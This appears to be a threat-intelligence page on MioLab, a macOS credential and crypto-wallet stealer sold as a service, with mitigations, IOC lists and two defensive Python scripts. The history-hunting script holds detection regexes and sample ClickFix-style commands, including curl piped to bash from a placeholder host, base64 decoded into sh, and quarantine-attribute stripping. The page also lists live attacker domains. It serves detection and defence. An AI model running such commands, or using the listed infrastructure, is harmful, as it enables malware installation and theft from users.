“Say My Name”: How MioLab is building MacOS Stealer Empire
MioLab is a Malware-as-a-Service (MaaS) platform targeting macOS. It specializes in stealing browser credentials and cryptocurrency wallet data, supports a wide range of browser wallet extensions and desktop wallets, and includes modules that capture the recovery seed phrases of Ledger and Trezor hardware wallets. The payload is lightweight, runs on both Intel and Apple Silicon Macs, and supports macOS versions from Sierra to Tahoe. Delivery relies on social engineering rather than a software vulnerability: customizable DMG installers with fake system prompts, and ClickFix lures that talk the victim into pasting a command into Terminal. Recent updates added Safari cookie theft and Apple Notes decryption. The operation runs on bulletproof hosting and is actively developed. Because no vulnerability is exploited, there is no patch or vendor advisory to apply; the mitigations are behavioral and operational.
AI Analysis
Technical Summary
MioLab (also known as Nova) is a macOS-focused Malware-as-a-Service platform advertised on Russian-speaking underground forums. Its payload is written in C, is lightweight, and runs on both Intel and Apple Silicon across macOS Sierra through Tahoe. Collection targets browser credentials and cryptocurrency wallets: more than 200 browser extensions and over 50 desktop wallets are supported, and a premium module targets Ledger and Trezor hardware wallets by capturing the 24-word BIP39 recovery seed phrase. Delivery relies on social engineering: a DMG builder with live previews of the installer, fake system prompts, and ClickFix integration (the victim is instructed to paste a command into Terminal). Recent additions include Safari cookie grabbing, automated Apple Notes decryption, and universal hardware wallet modules. The infrastructure sits on bulletproof hosting providers and shares components with other malware families. Since the platform abuses user interaction rather than a software flaw, there is no patch to apply.
Potential Impact
MioLab lets its operators steal browser credentials and cryptocurrency wallet data from macOS users, leading to account takeover and direct financial theft. Capturing hardware wallet recovery phrases is the most damaging capability: a stolen 24-word seed gives full control of a Ledger or Trezor wallet regardless of the device's own protections, because the seed reconstructs every key the device holds. Support for both CPU architectures and macOS versions from Sierra to Tahoe gives it a broad victim base. This page does not document specific campaigns or victims, but the platform's active development and feature set make it a medium-level threat to macOS users, particularly those holding cryptocurrency.
Mitigation Recommendations
MioLab exploits no software vulnerability, so there is no patch or vendor advisory to wait for; the controls are behavioral and operational.
- Treat unsolicited DMG installers as hostile, and never follow an installer's or web page's instruction to paste a command into Terminal (the ClickFix pattern). Legitimate software does not require this, and a Gatekeeper warning on an unsigned or unnotarized app should end the install rather than be bypassed.
- A hardware wallet's recovery phrase never needs to be entered on a computer. Any on-screen request for the 24-word seed, however it is branded, is the theft itself. If a seed was entered on a suspect Mac, treat the wallet as compromised and move the funds to a freshly generated wallet.
- Run endpoint protection that covers macOS and alert on stealer behavior: shell pipelines such as curl or base64 piped into sh spawned from Terminal, and reads of browser profile and cookie stores, wallet extension storage, and the Apple Notes database by processes other than the owning application.
- Block and hunt for the domains, URLs, and file hashes listed below; on a match, rotate browser-stored credentials and session cookies and move any wallet funds.
- Keep backups and train users; for social-engineering delivery, user vigilance is the primary control.
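The ClickFix step leaves a trace: the pasted command lands in the victim's shell history. The script below is an added example for this page, not code from the LevelBlue report or from MioLab. It scans zsh or bash history for the generic shape of such commands (download piped to a shell, base64 decoded into a shell, quarantine attribute stripped). The regexes, the history file locations, and the sample history (including the example.invalid host) are my assumptions, not indicators from the report.

```python
"""Hunt for ClickFix-style commands in macOS shell history.

Added example for this page; not code from the LevelBlue/MioLab report.
A ClickFix lure talks the victim into pasting a command into Terminal, so
the command usually survives in ~/.zsh_history, ~/.bash_history or
~/.zsh_sessions/*.history. The patterns below are generic heuristics
(assumptions, not indicators taken from the report).
"""
import re
import sys
from dataclasses import dataclass, field

# zsh EXTENDED_HISTORY lines look like ": 1714800010:0;command"
ZSH_EXTENDED = re.compile(r"^: \d+:\d+;(.*)$")

# (name, regex, strong). A line is flagged when at least one strong pattern
# matches; 'decoy_comment' only adds context, since comments are common.
PATTERNS = [
    ("curl_pipe_shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|k)?sh\b"), True),
    ("base64_decode_exec",
     re.compile(r"\bbase64\s+(-d|--decode|-D)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"), True),
    ("bg_download_exec",
     re.compile(r"\b(nohup|osascript|bash\s+-c)\b.*\b(curl|wget)\b"), True),
    ("xattr_quarantine_strip",
     re.compile(r"\bxattr\s+-[a-z]*d[a-z]*\s+com\.apple\.quarantine\b"), True),
    ("chmod_exec_tmp",
     re.compile(r"\bchmod\s+\+x\s+(/tmp|/private/tmp|/var/folders)/"), True),
    ("decoy_comment",
     re.compile(r"#\s*(fix|verify|confirm|update|captcha|robot)\b", re.I), False),
]


@dataclass
class Finding:
    line_no: int          # 1-based line in the history file
    command: str          # the command with any zsh timestamp prefix removed
    reasons: list = field(default_factory=list)


def normalize(raw):
    """Strip the zsh extended-history prefix, if present."""
    m = ZSH_EXTENDED.match(raw)
    return (m.group(1) if m else raw).strip()


def scan_history(lines):
    """Return a Finding for every line that matches a strong pattern."""
    findings = []
    for n, raw in enumerate(lines, start=1):
        cmd = normalize(raw)
        reasons = [name for name, rx, _ in PATTERNS if rx.search(cmd)]
        if any(strong for name, _, strong in PATTERNS if name in reasons):
            findings.append(Finding(n, cmd, reasons))
    return findings


# Constructed sample history; the hostname is a reserved example name.
SAMPLE_HISTORY = """\
: 1714800000:0;ls -la ~/Downloads
: 1714800010:0;curl -fsSL https://example.invalid/setup.sh | bash  # Fix macOS permissions
: 1714800020:0;echo aGVsbG8gd29ybGQK | base64 -d | sh
: 1714800030:0;xattr -d com.apple.quarantine ~/Downloads/Installer.app
: 1714800040:0;git status
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_HISTORY.splitlines()
    for f in scan_history(lines):
        print(f"line {f.line_no}: {', '.join(f.reasons)}\n    {f.command}")
```

Run it as `python3 clickfix_hunt.py ~/.zsh_history`; with no argument it scans the constructed sample and reports lines 2, 3, and 4. Hits are a starting point for review, not a verdict: a developer's curl-pipe-bash installer trips the same pattern, which is why the reasons are reported alongside the command.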
Indicators of Compromise
The list below reproduces the pulse as published, grouped by type; hash entries are grouped by digest length. Verify entries before blocking: `http.host` appears to be a log field name rather than a hostname, and the decodecybercrime.com and bruceketta.space entries (whose URLs are article paths) look like research references rather than attacker infrastructure.
Domains
- domain: http.host
- domain: marinemember.com
- domain: officerelaxation.com
- domain: approve-me.com
- domain: decodecybercrime.com
- domain: mioisiskwowiwjowuwjwolab.club
- domain: zynce.org
- domain: playavalon.org
- domain: socifiapp.com
- domain: command-confirm.com
- domain: approvecommand.com
- domain: adjustservices.com
- domain: approvalmechanism.com
- domain: automatic-approval.com
- domain: blindsettlement.com
- domain: bothnationaldomainzones.com
- domain: bruceketta.space
- domain: bucketowlsummary.com
- domain: captainnose.com
- domain: carrotvegetable.com
- domain: certainstoragefeel.com
- domain: charitydome.com
- domain: chopaquarium.com
- domain: command-distributor.com
- domain: commerceapprove.com
- domain: confirm-protocol.com
- domain: cucumbernonsense.com
- domain: decline.top
- domain: displacehaircut.com
- domain: establishtransmission.com
- domain: flexiblefinger.com
- domain: formalpyramid.com
- domain: frontbottle.com
- domain: frozenlilytaxi.com
- domain: horsemanufacturer.com
- domain: importantsquash.com
- domain: insightvariety.com
- domain: itemvalidation.com
- domain: macosdev.world
- domain: memorialapetite.com
- domain: ovalresponsibility.com
- domain: owqkoqoqoqoqoqqoqoo.info
- domain: peaceofmindzone.com
- domain: registrationprotocol.com
- domain: respectableneedle.com
- domain: revisemodule.com
- domain: rocqwkeorkcowqkrcw.icu
- domain: sculpturecherry.com
- domain: signaturemodule.com
- domain: singleenvironment.com
- domain: standardpoetry.com
- domain: stringmotivation.com
- domain: structurecarry.com
- domain: sunrisefootball.com
- domain: talentedfrog.com
- domain: technicalposition.com
- domain: terminalconfirm.com
- domain: terminalsignature.com
- domain: trackperformer.com
- domain: usefuldrum.com
- domain: weetspace.com
- domain: welldrawer.com
- domain: wheelchairmoments.com
- domain: wtkqwctkow.icu
Hashes (MD5, 32 hex characters)
- hash: 2422f04227fa86a149aed35d82f9a7fc
- hash: 5c1cd6b18d9cdb7a682560518f0438cc
- hash: c8678739a0301fc2a46bbc7ed8629386
- hash: 581f43161c591c43a3beb6d8e65b091a
- hash: 822c45a52cad26af77ea25f121724999
- hash: eeaba83f9e5a3922b02ba178c4ae445e
Hashes (SHA-1, 40 hex characters)
- hash: 138077b20c1886d0057983648c83deff9542a3cd
- hash: 65c1d23ca72d3699a382632db132352784999ab8
- hash: a8bb4b2c94187c91cd2cf62b23c2732625daff70
- hash: b18632cfdd732953bd5e13baba3bf11c84cc37f9
- hash: 521d6be1f630f4f8b21d57d1284b68ecc8fc9ad3
Hashes (SHA-256, 64 hex characters)
- hash: 1b38274f279c7c9aa8d45ac028b33bbf25861d706d10ecf017aa502a216cafbb
- hash: 2551e64498ed723fa2b258c9134ee299308ef91c82e14b9e873fc06dddb8f3f4
- hash: a24c82c2c4db20baef8998cb3c4935b74e83fec1a6c0e6bfcc64f4af19507b9c
- hash: 32c135068c2070c7821f7c7a325ab1350cc207bfba978cdc1c6f5ba0bae46e4e
- hash: 2c54e32bde2960344f0270c76c9616741c2947b6f3311424b8220d8c95c3664f
URLs
- url: https://socifiapp.com/api/reports/upload
- url: http://mioisiskwowiwjowuwjwolab.club/login
- url: https://bruceketta.space/posts/nova-script-251110/
- url: https://decodecybercrime.com/mapping-defhost-an-investigation-into-femo-it-solutions-limited-as214351/
- url: https://socifiapp.com
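To act on the list above, the following script is an added example (not code from the LevelBlue report or from MioLab). It parses IOCs in the page's own `- type: value` form, sorts hashes into MD5, SHA-1, and SHA-256 by digest length, derives hosts from URL entries, and matches them against DNS query logs and file digests, including the subdomain case (`cdn.socifiapp.com` matches, `notsocifiapp.com` does not). IOC_TEXT is a subset copied from the page; the log format, the sample queries, and the sample file digests are constructed for the demonstration.

```python
"""Match the IOCs published on this page against local telemetry.

Added example; not code from the LevelBlue report. IOC_TEXT is a subset
copied from the page's list (the whole list can be pasted in). The DNS
log lines and file digests further down are constructed.
"""
import hashlib
import re
import sys
from collections import defaultdict
from urllib.parse import urlsplit

IOC_TEXT = """\
- domain: marinemember.com
- domain: socifiapp.com
- domain: mioisiskwowiwjowuwjwolab.club
- hash: 2422f04227fa86a149aed35d82f9a7fc
- hash: 138077b20c1886d0057983648c83deff9542a3cd
- hash: 1b38274f279c7c9aa8d45ac028b33bbf25861d706d10ecf017aa502a216cafbb
- url: https://socifiapp.com/api/reports/upload
- url: http://mioisiskwowiwjowuwjwolab.club/login
"""

IOC_LINE = re.compile(r"^-\s*(domain|hash|url):\s*(\S+)\s*$")
HASH_ALGO_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256"}  # hex digest length


def parse_iocs(text):
    """Group IOCs by kind: domain, url, md5, sha1, sha256 (sets of str)."""
    out = defaultdict(set)
    for line in text.splitlines():
        m = IOC_LINE.match(line.strip())
        if not m:
            continue
        kind, value = m.group(1), m.group(2)
        if kind == "hash":
            value = value.lower()
            algo = HASH_ALGO_BY_LEN.get(len(value))
            if algo and re.fullmatch(r"[0-9a-f]+", value):
                out[algo].add(value)
        elif kind == "url":
            out["url"].add(value)
            host = urlsplit(value).hostname
            if host:                      # a URL IOC implies its host
                out["domain"].add(host.lower())
        else:
            out["domain"].add(value.lower().rstrip("."))
    return out


def domain_matches(name, domains):
    """True if name equals an IOC domain or is a subdomain of one."""
    # Compare label by label so notsocifiapp.com does not match socifiapp.com.
    labels = name.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in domains for i in range(len(labels)))


def hunt_dns(log_lines, domains):
    """Scan 'timestamp client qtype qname' lines; return (client, qname) hits."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) >= 4 and domain_matches(fields[3], domains):
            hits.append((fields[1], fields[3]))
    return hits


def hunt_hashes(observed, iocs):
    """observed maps path -> hex digest; return (path, algo) for IOC matches."""
    hits = []
    for path, digest in observed.items():
        digest = digest.lower()
        algo = HASH_ALGO_BY_LEN.get(len(digest))
        if algo and digest in iocs.get(algo, ()):
            hits.append((path, algo))
    return hits


def digest_file(path, algo="sha256"):
    """Hex digest of a file, read in 1 MiB chunks."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


# Constructed telemetry: a resolver log and digests of two local files.
SAMPLE_DNS_LOG = """\
2026-05-04T10:01:02Z 10.0.0.12 A apple.com
2026-05-04T10:01:05Z 10.0.0.12 A cdn.socifiapp.com
2026-05-04T10:01:09Z 10.0.0.12 A mioisiskwowiwjowuwjwolab.club
2026-05-04T10:02:00Z 10.0.0.33 A notsocifiapp.com
"""
SAMPLE_FILE_HASHES = {
    "/Users/alice/Downloads/Installer.dmg":
        "1B38274F279C7C9AA8D45AC028B33BBF25861D706D10ECF017AA502A216CAFBB",
    "/Applications/Safari.app/Contents/MacOS/Safari": "0" * 64,
}

if __name__ == "__main__":
    iocs = parse_iocs(IOC_TEXT)
    for client, qname in hunt_dns(SAMPLE_DNS_LOG.splitlines(), iocs["domain"]):
        print(f"DNS hit: {client} -> {qname}")
    observed = {p: digest_file(p) for p in sys.argv[1:]} or SAMPLE_FILE_HASHES
    for path, algo in hunt_hashes(observed, iocs):
        print(f"hash hit ({algo}): {path}")
```

With file paths as arguments the script hashes those files with SHA-256 and checks them; with none it uses the constructed digests. Feed the DNS stage whatever resolver or EDR export you have by adapting the field positions in `hunt_dns`; the subdomain-aware match matters because stealer C2 commonly sits under a registered IOC domain.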
Technical Details
- Author: AlienVault
- TLP: white
- References: https://www.levelblue.com/blogs/spiderlabs-blog/say-my-name-how-miolab-is-building-macos-stealer-empire
- Adversary: MioLab
- Pulse Id: 69f3653e884ec7a430371ba3
- Threat Score: null
Threat ID: 69f884b6cbff5d861010660c
Added to database: 5/4/2026, 11:36:22 AM
Last enriched: 5/4/2026, 11:51:23 AM
Last updated: 5/4/2026, 1:39:47 PM